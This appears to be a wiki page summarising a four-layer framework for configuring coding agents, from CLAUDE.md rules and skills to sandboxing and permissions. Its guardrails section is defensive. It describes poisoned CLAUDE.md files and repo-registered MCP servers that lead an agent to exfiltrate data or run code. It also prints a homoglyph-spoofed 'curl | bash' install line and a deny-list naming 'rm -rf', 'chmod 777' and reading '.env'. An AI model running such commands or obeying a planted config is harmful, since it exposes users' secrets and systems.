Agentic Engineering
A four-layer framework for configuring coding agents to produce reliable, production-quality results.
Last updated: 2026-04-12
Overview
“Agentic Engineering” is Karpathy’s term for the emerging practice of working effectively with autonomous coding agents — distinct from vibe coding (prompting casually) or traditional software engineering. The gap between mediocre and excellent agent results is mostly about configuration, not model choice.
Paul Hoekstra’s framework organizes this into four layers, each addressing a different failure mode:
| Layer | What it solves | Key tools |
|---|---|---|
| Configuration | Agent ignoring conventions, defaulting to training data | CLAUDE.md, skills, workflow frameworks |
| Capability | Agent hallucinating, lacking live context | MCP servers, memory, live docs |
| Orchestration | Parallel work conflicts, slow sequential execution | Subagents, worktrees |
| Guardrails | Destructive actions, security, runaway autonomy | Hooks, permissions |
Layer 1: Configuration
CLAUDE.md — less is more
CLAUDE.md is injected into every API call, not just the first. A 2,000-token file in a 40-call session costs 80,000 input tokens just for instructions. Context bloat degrades performance: GPT-5.4 drops from 97.3% to 36.6% benchmark score at full context. A study found AI-generated boilerplate in the system prompt produces worse results than no file at all.
Rules of thumb:
- Only include specific, human-curated rules you want enforced at all times
- Keep it short; treat it as a living document
- Cut any rule not consistently improving outcomes
- When the model makes the same mistake repeatedly, add a targeted rule
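A minimal CLAUDE.md following these rules might look like this (the specific rules are illustrative, not from the source):

```markdown
# Project rules

- Run tests with `uv run pytest`, never bare `pytest`.
- All SQL goes through the repository layer in `app/db/`; no inline queries.
- Never push directly to main; always open a PR.
```

Short, specific, and every line earns its place in every API call.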
Skills — loaded on demand
Skills live in .claude/skills/ and load contextually, not always. They keep domain knowledge out of the always-on context window. YAML frontmatter (name, description, globs) controls when they trigger.
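As a sketch, a skill file might look like this (the source names only the name, description, and globs frontmatter fields; the values and body here are illustrative):

```markdown
---
name: database-migrations
description: Use when creating or reviewing Alembic migration scripts
globs: ["migrations/**/*.py"]
---

When writing a migration, always include a working downgrade() and
verify it round-trips against a scratch database before committing.
```

The description doubles as the routing signal: it tells the model when to pull the skill into context.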
SkillsBench evidence: Claude Haiku with human-curated skills (27.7%) beat Claude Opus without skills (22.0%) across 86 tasks. Skills matter more than model size. AI-generated skills erased all gains — human curation is the differentiator.
Enforcing skill compliance
Skills enforce nothing by default — models rationalize past instructions. Two techniques from obra/superpowers:
HARD-GATE directives: XML-tagged checkpoints. Models give disproportionate weight to XML-like tags (Anthropic recommends this in their own prompt engineering docs):
<HARD-GATE>
Do NOT write any code or take any implementation action
until you have presented a design and the user has approved it.
This applies to EVERY project regardless of perceived simplicity.
</HARD-GATE>
Anti-rationalization tables: Pre-emptive lists of common model excuses paired with corrections. The model generates plausible reasons to skip steps because humans in training data do the same. The table short-circuits this pattern before it starts.
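A sketch of what such a table might contain (entries are illustrative, not taken from obra/superpowers):

```markdown
| Rationalization | Correction |
|---|---|
| "This change is trivial, tests aren't needed" | Triviality is not an exemption; write the test. |
| "The user is in a hurry, I'll skip the design step" | Urgency never waives the design gate. |
| "The existing code doesn't do X, so I won't either" | Existing gaps are not precedent; follow the rule. |
```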
Workflow frameworks
Full methodologies built from chained skills:
- Superpowers (obra/superpowers): TDD, debugging, verification, code review skills with hard gates
- Get Shit Done: slash commands + hooks + meta-prompting
- Compound Engineering: Plan → Work → Review → Compound; last phase accumulates patterns into a searchable knowledge base
Division of labour
CLAUDE.md → always-relevant project rules (short, human-curated)
Skills → reusable task-specific procedures (loaded on demand)
Live prompt → what's unique about the current task
The AI Sycophancy Problem
Models default to telling you what you seem to want to hear, not what’s true. The Bullshit Benchmark measures how often models challenge incoherent prompts vs. accept them. Results are poor across the board. In code, this manifests as redundant checks, unnecessary validation, and defensive error handling nobody asked for — instead of questioning bad assumptions.
CLAUDE.md behavioral rules and HARD-GATE directives are partly a defense against this default.
Layer 2: Capability
MCP and deferred loading
Fully loaded MCPs are expensive: GitHub MCP alone is ~2,200 tokens. With deferred tool loading (the default as of 2026), the agent starts with just a list of tool names and descriptions — full schema only fetched when a tool is actually used. A stack of GitHub + Exa + Context7 + DeepWiki runs ~607 tokens before any tools are used, vs. ~5,500 tokens fully loaded. Still more than a skill (which might be a few dozen tokens), but manageable.
MCP’s value isn’t just calling tools — it’s standardisation, auth, permissions, and cleaner interfaces than raw APIs/CLIs that were never designed with agents in mind.
The three external tools worth having
- Context7: pulls live library docs, eliminating hallucinated API calls to renamed/deprecated functions
- DeepWiki: AI-generated docs for GitHub repos — “how does authentication work?” answered from the actual codebase
- Exa: AI-optimized search returning structured results, extracted content, highlights — not raw pages
Visual output extensions
Skills and MCPs aren’t limited to application code. Figma’s MCP server lets the agent read design specs and write back to the Figma canvas. frontend-slides (Claude Code skill) generates complete self-contained HTML presentations. remotion-best-practices produces Remotion/React code that renders to MP4.
Persistent memory: three layers
Claude Code sessions are stateless; each starts fresh. Three tools address memory at different layers:
| Layer | Tool | What it covers | Scales? |
|---|---|---|---|
| Active context | MEMORY.md | Conventions, current decisions | No — flat file, token pressure |
| Session history | episodic-memory | Past conversations, reasoning traces | Yes — SQLite + vectors |
| Broader knowledge | QMD (Tobi Lutke/Shopify) | Docs, specs, meeting notes | Yes — on-device search |
MEMORY.md works well at first; fails at scale because it’s injected into every system prompt like CLAUDE.md. episodic-memory (github.com/obra/episodic-memory) indexes JSONL session files as vectors so the agent can semantically search past conversations — recovering not just what was decided but why. QMD (github.com/tobi/qmd) exposes an MCP server over your broader knowledge base. Start with grep; reach for vectors when grep stops being enough.
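The grep-first approach is cheap to demonstrate. This is illustrative only: session transcripts as JSONL files in a throwaway temp directory (Claude Code keeps real ones elsewhere; the point is plain text search before vector search):

```shell
# Create a fake session transcript and search it with grep
mkdir -p /tmp/sessions-demo
printf '%s\n' '{"role":"assistant","text":"chose sqlite over postgres for portability"}' \
  > /tmp/sessions-demo/session-001.jsonl
grep -ril "sqlite" /tmp/sessions-demo   # lists files mentioning sqlite
```

When the transcript pile grows past what keyword search can navigate ("what did we decide about persistence?" rather than "sqlite"), that is the signal to move to episodic-memory's vector index.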
See agent-memory for the full three-layer breakdown.
Layer 3: Orchestration
Context quality is the bottleneck
The Ralph loop (github.com/snarktank/ralph) went viral by doing something trivially simple: re-running a single agent in a loop with fresh context each iteration, tracking progress in files and git. Agents could work for hours without degrading, because the context window never filled up with stale reasoning and dead ends.
Subagents work for the same reason. The obvious benefit is parallelism. The bigger benefit is compression: test output, long docs, side quests all stay in the subagent’s context. Only the final result returns to the parent.
Subagents vs agent teams
Subagents: fire-and-forget workers, each with a clean context window and one job. Defined as Markdown files with YAML frontmatter in .claude/agents/ (project-level) or ~/.claude/agents/ (user-level). Key fields: name, description (routing signal — when to reach for this agent), tools, model. Cannot spawn subagents or talk to each other; all results flow through the parent.
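A minimal subagent definition, as a sketch (the frontmatter fields match those listed above; the values and body are illustrative):

```markdown
---
name: test-runner
description: Run the test suite and summarize failures; use after any code change
tools: Bash, Read
model: haiku
---

Run the project's tests, then report only the failing tests with a
one-line diagnosis each. Do not modify any files.
```

Note the compression at work: the parent never sees the raw test output, only the summary.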
Agent teams (experimental, CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1): long-running persistent instances that communicate directly with each other and coordinate via a shared task list with dependencies. Heavier, higher cost. For most use cases, start with subagents.
Git worktrees for parallel isolation
Multiple agents on the same repo will collide without worktrees. A worktree is a separate checkout sharing the same .git directory but with its own working tree and branch:
my-project/.worktrees/
├── feature-auth/ # agent 1
└── fix-billing/ # agent 2
claude --worktree starts a session in an isolated checkout. Setting isolation: "worktree" in a subagent definition does the same automatically. Project configs and memory are shared across worktrees.
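The layout above can be reproduced by hand with plain git (throwaway paths for illustration; claude --worktree automates this):

```shell
# Throwaway repo demonstrating the worktree layout
rm -rf /tmp/wt-demo && mkdir -p /tmp/wt-demo && cd /tmp/wt-demo
git init -q
git -c user.email=agent@example.com -c user.name=agent \
  commit -q --allow-empty -m init
git worktree add .worktrees/feature-auth -b feature-auth   # agent 1's checkout
git worktree add .worktrees/fix-billing -b fix-billing     # agent 2's checkout
git worktree list   # both share one .git, each has its own branch
```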
Orchestration tools
- JetBrains Air: parallel agents in isolated Docker containers or worktrees, single review UI
- Conductor (conductor.build): similar for Claude Code + Codex; parallel sessions + diff viewer
- Vibekanban (github.com/BloopAI/vibe-kanban): lightweight kanban for agent tasks
- Cline Kanban: project decomposition from a single prompt; dependency-aware parallelization
- Paperclip (github.com/paperclipai/paperclip): org charts, task delegation, budget ceilings, governance with human “board” for high-impact decisions
Design around context, not roles
Splitting work by role (planner, implementer, tester) creates a telephone game where information degrades at every handoff. Split by context instead: an agent implementing a feature should also write its tests because it already has the context. The sweet spot is read-heavy delegation — exploration, analysis, summarisation. Keep write-heavy work sequential unless parallelism is truly necessary.
Layer 4: Guardrails
CLAUDE.md and MCP poisoning
A cloned repo can contain a CLAUDE.md with instructions that look like normal project config but exfiltrate data or execute arbitrary commands. Treat CLAUDE.md like a Makefile — as code, not documentation. Review before trusting. PR review required; no direct pushes to main.
Critical: Set enableAllProjectMcpServers: false. Otherwise a cloned repo can register its own MCP server — arbitrary code running with agent permissions. Combined with a poisoned CLAUDE.md, this is a clean supply-chain attack from a git clone.
Unicode homoglyph attacks
curl -sSL https://install.example-cli.dev | bash and curl -sSL https://іnstall.example-clі.dev | bash look identical. The Latin i is U+0069 (ASCII 105); the Cyrillic і is U+0456 (decimal 1110). Browsers render punycode as a defense; terminals don’t.
Tirith (github.com/sheeki03/tirith): a local validator behind a PreToolUse hook on Bash. Catches hostname homoglyphs, path homoglyphs, insecure transport, ANSI injection, pipe-to-shell patterns, and environment manipulation.
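The core check is simple to sketch in Python (a toy version of one of Tirith's checks, not its actual implementation):

```python
import unicodedata

def hostname_is_suspicious(host: str) -> bool:
    """Flag any non-ASCII character in a hostname as a potential homoglyph."""
    return not host.isascii()

latin = "install.example-cli.dev"
spoofed = "\u0456nstall.example-cl\u0456.dev"  # Cyrillic і (U+0456) replaces Latin i

assert not hostname_is_suspicious(latin)
assert hostname_is_suspicious(spoofed)
# The two render near-identically but differ at the code-point level:
assert unicodedata.name("\u0456") == "CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I"
```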
Sandboxing
Built-in sandbox (Linux: bubblewrap; macOS: Apple Sandbox):
- Can read: project dir + system libraries
- Can write: project dir + /tmp/claude-{uid}/
- Blocked even for reading: ~/.ssh, ~/.aws, ~/.gnupg, ~/.docker
- Network: whitelisted hosts only
For full isolation: Docker with --network none. For agent-generated code at scale: Cloudflare Dynamic Workers (per-execution, millisecond startup, credentials injected server-side).
Permissions
.claude/settings.json (project-level, committed to the repo) defines what the agent can do without asking. .claude/settings.local.json (personal overrides, not committed) adds a deny-list:
{
"permissions": {
"allow": ["Bash(uv run pytest:*)", "Bash(git commit:*)", "Bash(gh pr create:*)"],
"deny": ["Read(./.env)", "Bash(rm -rf)", "Bash(chmod 777)", "Bash(git push --force origin main)"]
}
}

Auto mode: built-in classifier between full manual approval and --dangerously-skip-permissions. Safe operations proceed automatically; risky ones get blocked. Combined with the deny-list and sandboxing, this lets the agent move without constant hand-holding.
AST-grep
AI writes syntactically perfect code that smuggles in subtly wrong patterns — code that passes ruff, passes type checking, maybe even passes tests, but contains patterns you never wanted. AST-grep catches this by matching code structure, not strings.
Example — mutable default arguments (AI reproduces this from millions of training examples without understanding it’s dangerous):
id: no-mutable-default-list
language: python
severity: error
rule:
  kind: default_parameter
  any:
    - has: { kind: list }
    - has: { kind: dictionary }

Wire into pre-commit and CI. If your agent keeps producing the same anti-pattern, encode it as a structural rule and stop having the same conversation forever.
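For reference, the bug this rule targets, sketched in Python:

```python
# The anti-pattern: a mutable default is created once at function
# definition time and shared across every call.
def append_item(item, bucket=[]):
    bucket.append(item)
    return bucket

assert append_item("a") == ["a"]
assert append_item("b") == ["a", "b"]  # surprise: state leaks between calls

# The safe idiom: default to None, allocate a fresh list per call.
def append_item_safe(item, bucket=None):
    if bucket is None:
        bucket = []
    bucket.append(item)
    return bucket

assert append_item_safe("a") == ["a"]
assert append_item_safe("b") == ["b"]  # no shared state
```

It passes linters and type checkers, which is exactly why a structural rule is needed.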
Pre-commit: the corrective loop
Four layers: standard hooks (trailing whitespace, valid YAML, 500KB limit) → Ruff → Bandit → AST-grep. The loop is corrective, not just defensive: agent writes code, hits pre-commit rejection, rewrites, commits clean. The enforcement teaches.
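A sketch of the four layers as a .pre-commit-config.yaml (the rev pins and the ast-grep wiring are illustrative assumptions; check each project's docs for current versions):

```yaml
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.6.0
    hooks:
      - id: trailing-whitespace
      - id: check-yaml
      - id: check-added-large-files
        args: ["--maxkb=500"]
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.6.9
    hooks:
      - id: ruff
  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.9
    hooks:
      - id: bandit
  - repo: local
    hooks:
      - id: ast-grep
        name: ast-grep structural lint
        entry: ast-grep scan
        language: system
        types: [python]
```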
CI: the shared gate
Same checks enforced remotely in a fresh environment. Add a concurrency block to cancel stale runs when a new push arrives — agents are prolific branch creators, and without this you burn Actions minutes on obsolete runs.
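In GitHub Actions, the stale-run cancellation is a standard concurrency block at the top of the workflow:

```yaml
# Cancel any in-flight run for the same workflow + branch when a new push lands
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
```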
Connections
- claude-code-skills — detailed breakdown of skill types, writing tips, distribution; HARD-GATE and anti-rationalization extend this
- thin-harness-fat-skills — same architectural principle; Hoekstra adds the token cost argument for keeping the config layer lean
- coding-agent — Raschka’s six-component harness maps onto Hoekstra’s four layers
- model-context-protocol — Layer 2 (Capability) relies on MCP servers for live data access
- agent-memory — three-layer memory model from Layer 2 in detail
- paul-hoekstra — author
Sources
- Agentic Engineering, part 1: The Configuration Layer — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 2: What the Agent Doesn’t Know — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 3: The Orchestration Layer — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 4: Keeping Agents on a Leash — Paul Hoekstra — added 2026-04-12